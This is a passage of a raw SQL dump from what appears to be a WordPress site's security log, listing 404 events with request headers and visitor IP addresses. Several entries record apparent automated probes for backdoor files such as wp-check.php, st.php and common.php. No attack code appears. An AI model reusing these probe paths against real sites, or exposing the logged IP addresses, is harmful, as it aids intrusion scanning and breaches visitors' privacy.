Firefox/77.0\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631295915.2072141170501708984375;s:12:\"REQUEST_TIME\";i:1631295915;}}','notice','2021-09-10 17:45:17','2021-09-10 17:45:15',72646448,72730208,'http://mail.zphiblgz.org/emergency.php',1,0,'18.116.26.219'),(96956,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631297641.8215389251708984375;s:12:\"REQUEST_TIME\";i:1631297641;}}','notice','2021-09-10 18:14:03','2021-09-10 18:14:02',72603912,72687648,'http://zphiblgz.org/scholarship/application/',1,0,'46.161.11.21'),(96957,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.34 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631303095.8243958950042724609375;s:12:\"REQUEST_TIME\";i:1631303095;}}','notice','2021-09-10 19:44:57','2021-09-10 19:44:56',72603912,72687648,'http://zphiblgz.org/scholarship/application/',1,0,'1.169.89.210'),(96958,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"30\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631303416.23138904571533203125;s:12:\"REQUEST_TIME\";i:1631303416;}}','notice','2021-09-10 19:50:18','2021-09-10 19:50:16',72651680,72736312,'https://zphiblgz.org/wp-check.php',1,0,'185.191.34.215'),(96959,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:45:\"https://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631304907.5382869243621826171875;s:12:\"REQUEST_TIME\";i:1631304907;}}','notice','2021-09-10 20:15:09','2021-09-10 20:15:07',72629824,72712808,'https://zphiblgz.org/scholarship/application/',1,0,'199.249.230.163'),(96960,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:101:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631312476.954288959503173828125;s:12:\"REQUEST_TIME\";i:1631312476;}}','notice','2021-09-10 22:21:18','2021-09-10 22:21:17',72603880,72687616,'http://zphiblgz.org/scholarship/application/',1,0,'193.189.100.203'),(96961,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631313781.435698986053466796875;s:12:\"REQUEST_TIME\";i:1631313781;}}','notice','2021-09-10 22:43:03','2021-09-10 22:43:01',72627088,72711704,'https://zphiblgz.org/st.php',1,0,'185.191.34.215'),(96962,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631314168.6458759307861328125;s:12:\"REQUEST_TIME\";i:1631314168;}}','notice','2021-09-10 22:49:30','2021-09-10 22:49:28',72603912,72687648,'http://zphiblgz.org/scholarship/application/',1,0,'45.153.55.26'),(96963,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631321420.2463190555572509765625;s:12:\"REQUEST_TIME\";i:1631321420;}}','notice','2021-09-11 00:50:22','2021-09-11 00:50:20',72646144,72729904,'http://zphiblgz.org/emergency.php',1,0,'18.116.26.219'),(96964,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:11:\"HTTP_ACCEPT\";s:99:\"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.3\";s:19:\"HTTP_ACCEPT_CHARSET\";s:32:\"utf-8,windows-1251;q=0.7,*;q=0.7\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-us,en;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:14:\"max-age=259200\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2845.96 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631321844.6907589435577392578125;s:12:\"REQUEST_TIME\";i:1631321844;}}','notice','2021-09-11 00:57:26','2021-09-11 00:57:24',72628520,72712264,'http://zphiblgz.org/contact/',1,0,'23.229.57.244'),(97228,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632015122.8066608905792236328125;s:12:\"REQUEST_TIME\";i:1632015122;}}','notice','2021-09-19 01:32:04','2021-09-19 01:32:03',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'180.167.101.134'),(97229,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:101:\"Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632019172.81457996368408203125;s:12:\"REQUEST_TIME\";i:1632019172;}}','notice','2021-09-19 02:39:35','2021-09-19 02:39:33',72734776,72818512,'http://zphiblgz.org/scholarship/application/',1,0,'185.242.113.224'),(97230,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632019230.0807549953460693359375;s:12:\"REQUEST_TIME\";i:1632019230;}}','notice','2021-09-19 02:40:31','2021-09-19 02:40:30',72168848,72256112,'https://zphiblgz.org/event/youth-open-house/',1,0,'207.46.13.170'),(97231,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632022193.22815990447998046875;s:12:\"REQUEST_TIME\";i:1632022193;}}','notice','2021-09-19 03:29:55','2021-09-19 03:29:53',72649672,72748968,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'94.155.33.88'),(97232,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632022196.4166519641876220703125;s:12:\"REQUEST_TIME\";i:1632022196;}}','notice','2021-09-19 03:29:58','2021-09-19 03:29:56',72650848,72750248,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'94.155.33.88'),(97233,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632022199.572505950927734375;s:12:\"REQUEST_TIME\";i:1632022199;}}','notice','2021-09-19 03:30:01','2021-09-19 03:29:59',72650848,72750248,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'94.155.33.88'),(97234,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632022202.832004070281982421875;s:12:\"REQUEST_TIME\";i:1632022202;}}','notice','2021-09-19 03:30:04','2021-09-19 03:30:03',72650848,72750248,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'94.155.33.88'),(97235,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632027081.80084896087646484375;s:12:\"REQUEST_TIME\";i:1632027081;}}','notice','2021-09-19 04:51:23','2021-09-19 04:51:22',72144984,72228176,'https://zphiblgz.org/event/ladiez-real-talk-empowerment-summit/',1,0,'40.77.167.66'),(97236,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:16:\"application/json\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:14:\"ALittle Client\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632027371.7300319671630859375;s:12:\"REQUEST_TIME\";i:1632027371;}}','notice','2021-09-19 04:56:13','2021-09-19 04:56:11',72604968,72688704,'http://zphiblgz.org/templates/index.html',1,0,'23.228.109.147'),(97237,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:21:\"http://simplesite.com\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632028987.313500881195068359375;s:12:\"REQUEST_TIME\";i:1632028987;}}','notice','2021-09-19 05:23:09','2021-09-19 05:23:07',72659944,72760016,'http://zphiblgz.org/wordpress/wp-admin/link-edd.php',1,0,'47.112.21.141'),(97238,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632030485.503582000732421875;s:12:\"REQUEST_TIME\";i:1632030485;}}','notice','2021-09-19 05:48:07','2021-09-19 05:48:05',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'194.226.97.115'),(97239,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632044775.55535888671875;s:12:\"REQUEST_TIME\";i:1632044775;}}','notice','2021-09-19 09:46:17','2021-09-19 09:46:15',72613960,72696304,'https://zphiblgz.org/wp-content/common.php',1,0,'185.191.34.215'),(97240,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"50\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 